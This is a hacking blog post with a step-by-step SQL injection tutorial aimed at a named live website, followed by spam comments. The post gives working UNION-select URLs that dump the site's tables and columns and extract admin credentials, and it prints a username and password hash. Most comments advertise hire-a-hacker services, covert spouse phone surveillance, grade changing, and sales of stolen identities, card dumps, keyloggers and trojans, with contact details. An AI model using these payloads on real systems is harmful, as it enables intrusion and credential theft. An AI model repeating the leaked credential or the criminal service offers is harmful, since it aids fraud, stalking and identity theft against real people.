- Sql Injection -

This Article Is About how to Hack a website with SQL Injection. I and stealthhackroom.blogspot.com Takes No responsibility for it’s misuse.ok.

we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end

http://www.allaboutcar.net/articles.php?topic=3'\

it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

do that untill u get a error

It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

that mean it only has 5 columns .. because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5

5.0.67

ok now ..

let get the table names.. to do that u need to use this commands

group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables

http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins

,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,

forum_c,gbook,

infopages,

jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,

users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,

topic,author,id,ip,

date,id,title,

alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,

what,date,wid,name,

mail,title,

text,ip,

id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .

So Friends that all for this tutorial
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253

16 comments:

meloney marcus14 January 2019 at 06:39
Hello, are you in need of hacking services? Then contact cyberghost475@gmail.com, he is the best hacker. He helped me and

my friends with some issues we had. If you need to hack into email accounts, all social media accounts(facebook, twitter,

whatsapp, instagram), school database to clear or change grades, Credit cards hack, credit score hack, blank credit card

sale, Hack and use Credit Card to shop online, Monitor any phone and email address. Contact him
Email: cyberghost475@gmail.com.or whatsapp +1 929 359 3547
ReplyDelete
Replies
meloney14 July 2019 at 17:08
Do you need to increase your credit score?
Do you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cyberghost475 AT gmail DOT com no:+1 929 359 3547
ReplyDelete
Replies
Unknown7 December 2019 at 02:13
This is Good information about this topic..I like it.. wordpress database errors ..Keep it Up!
ReplyDelete
Replies
jane holly28 May 2020 at 10:31
This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change

Email: onlineghosthacker247@ gmail .com
ReplyDelete
Replies
Unknown14 June 2020 at 08:28
I never know that a cell phone can only be hacked remotely using the phone number until I was introduced to a hacker called Vlad who helped me hack into my wife's phone with just her cell phone number , Now I can track her phone location, her WhatsApp messages, Facebook and all her calls are recorded so I can listen to them. If you think your partner or spouse is cheating, I advise you to contact the hacker on WhatsApp to help you. +79045147090 or [arturplavnik @ gMail . com], tell him that Leonard told you about him. In this way, I show appreciation for helping me with problems with my betrayed wife
ReplyDelete
Replies
sobia28 October 2020 at 00:33
In this case you will begin it is important, it again produces a web site a strong significant internet site: private investigation
ReplyDelete
Replies
Anderson Kate7 November 2020 at 16:33
Hi. I went over a stunning Hacker Kevin Mitnick. They have assisted with a colossal measure of issues like Phone Hack, Account Hack, Clear Debts, Grade update, Criminal Records help E.t.c. They spared my life.

you can contact by strategies for

email: kevinmitnick773 (at) gmail website

Text/Call: +18634559148

Whatsapp: +18634559148
ReplyDelete
Replies
madison johnson3 January 2021 at 17:22
Hi. I went over an amazing Hacker Jonathan James. They have assisted with a colossal extent of issues like Phone Hack, Account Hack, Clear Debts, Grade update, Criminal Records help E.t.c. They saved my life.

you can contact by strategies for

email: jonathanjames548 (at) gmail site

Text/Call: +17076901052

WhatsApp: +17076901052
ReplyDelete
Replies
Unknown8 May 2021 at 18:15
Outstanding and wonderful information about Unethical and Black Hat hacking services. If you want to hire someone. Instead, look for an independent consultant who can find and fix the most vulnerabilities and fix them responsibly. Doing so will make sure your computer systems are safe from attack, and it won't hurt your business in the long run.

Hire phone hacker
ReplyDelete
Replies
Andrew Smith18 June 2021 at 19:13
Lovely information. I like your blog post. Lots of people are using mobile phone. So if anyone want phone hacker for hire. If they suspect that their spouse is cheating on them, they can hire a hacker to track everything they are doing online. This is especially helpful because many cheaters use various methods to cover their tracks, including changing IP addresses.
ReplyDelete
Replies
Debbie Atkinson Parker13 September 2021 at 05:58
You need password into any device that is giving you hard times to get into? Just email jeajamhacker@gmail.com this hacker is the best all over trust me you wont be disappointed, I have used his services countless times and its always 100%
ReplyDelete
Replies
Anonymous30 January 2022 at 03:12
TOOLS&FULLZ SHOP
_______________

hi EveryonE!

Are you been stuck for looking valid products or been scammed by scammers :(

Here the Valid store available for all kind of tools,tutorials & Fullz with quality

Learn hacking and spamming and do it on your own way & enjoy..........

_______________

1)FRESHLY SPAMMED USA FULLZ
2)HACKING & SPAMMING TOOLS
3)TUTORIALS
_______________

*Contact*
*ICQ :748957107
*Gmail : groothighx@gmail.com
*Telegram : @James307
*Skype : Jamesvince$
_______________
USA SSN FULLZ WITH ALL PERSONAL DATA+DL NUMBER
-FULLZ FOR PUA & SBA
-FULLZ FOR TAX REFUND
*fullz/lead with DL num
*SSN+DOB
*Premium info
ID's Photos For any state (back & front)
________________
+US cc Fullz
+(Dead Fullz)
+(Email leads with Password)
+(Dumps track 1 & 2 with pin and without pin)
+HACKING & CARDING TUTORIALS
+SMTP LINUX
+SAFE SOCK
+CPANEL
+RDPs
+Spamming Tutorial
+SERVER I.Ps
+EMAIL COMBO
+DUMPS TUTORIAL
+BTC FLASHER
+KEYLOGGER COMP&MOB
+EMAIL BOMBER
+SQLI INJECTOR
+ETHICAL HACKING TUTORIAL
+GMAIL HACKING TUTORIAL
+PENETRATION TESTING TUTORIAL
+PayPal Cracker
+BTC Cracker
+BLUE PRINTS BLOCKCHAIN
+EMAIL BLASTER
+SMS SENDER
+NORD VPN
+ONION LINKS AND TOR BROWSER (LATEST VERSION)
+DARK HORSE TROJAN
+NETFLIX CHECKER
+IP ROUTING
+KEYSTROKE LOGGER
+WESTERN UNION LOGINs
+ALI BABA IPs
+KEYLOGGER
+SHELL SCRIPTING
_______________
*Let's do a long term business with good profit
*Contact for more details & deal

*Contact*
*ICQ :748957107
*Gmail: groothighx@gmail.com
*Telegram :@James307
*Skype : Jamesvince$
ReplyDelete
Replies
ICQ 7528220402 March 2022 at 18:44
*==*FULLZ & TOOLZ STORE*==*

**Contact 24/7**
Telegram > @leadsupplier
ICQ > 752822040
Skype > Peeterhacks
Wicker me > peeterhacks

**HIGH CREDIT SCORES SSN FULLZ AVAILABLE**

>For tax filling/return
>SSN DOB DL all info included
>For SBA & PUA
>Fresh spammed & Fresh database

**TOOLS & TUTORIALS AVAILABLE FOR HACKING SPAMMING
CARDING CASHOUT CLONING SCRIPTING**

Fullz info included
NAME+SSN+DOB+DL+DL-STATE+ADDRESS
Employee & Bank details included
High credit fullz with DL 700+
(bulk order preferable)
**Payment in all crypto currencies will be accepted**

->You can buy few for testing
->Invalid or wrong info will be replaced
->Serious buyers contact me for long term business & excellent profit
->Genuine & Verified stuff

TOOLS & TUTORIALS AVAILABLE:

"SPAMMING" "HACKING" "CARDING" "CASH OUT"
"KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"

**TOOLS & TUTORIALS LIST**

=>US CC Fullz
=>Ethical Hacking Tools & Tutorials
=>Bitcoin Hacking
=>Kali Linux
=>Keylogger & Keystroke Logger
=>Bulk SMS Sender
=>Facebook & Google Hacking
=>Bitcoin Flasher
=>SQL Injector
=>Logins Premium (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
=>Bitcoin Cracker
=>SMTP Linux Root
=>Shell Scripting
=>DUMPS with pins track 1 and 2 with & without pin
=>SMTP's, Safe Socks, Rdp's brute
=>PHP mailer
=>SMS Sender & Email Blaster
=>Cpanel
=>Server I.P's & Proxies
=>Viruses & VPN's
=>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)

==>Contact 24/7<==
Telegram> @leadsupplier
ICQ> 752822040
Skype> Peeterhacks
Wicker me > peeterhacks

*Serious buyers are always welcome
*Big Discount in bulk order
*Offer gives monthly, quarterly, half yearly & yearly
*Hope we do a great business together

**You should try at least once**
ReplyDelete
Replies
contact org13 April 2022 at 01:57
Hey, Great Post!! If you need a hire professional hacker for your work and official, don't hesitate to contact us and visit our website at Vaulthacks.
ReplyDelete
Replies

Add comment

black hat hacker

- Sql Injection -

16 comments:

About Me

Blog Archive